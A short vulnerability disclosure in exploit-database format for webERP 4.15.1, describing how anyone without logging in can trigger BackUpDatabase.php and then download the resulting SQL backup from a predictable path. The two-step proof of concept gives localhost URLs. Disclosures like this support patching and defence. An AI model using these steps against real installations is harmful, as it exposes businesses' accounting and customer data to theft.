# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access# Date: 2020-05-01# Author: Besim ALTINOK# Vendor Homepage: http://www.weberp.org# Software Link: https://sourceforge.net/projects/web-erp/# Version: v4.15.1# Tested on: Xampp# Credit: İsmail BOZKURT--------------------------------------------------------------------------
About Software:
webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution,and manufacturing.-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------1- This file generates new Backup File:
http://localhost/webERP/BackUpDatabase.php
2- Someone can download the backup filefrom:--
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
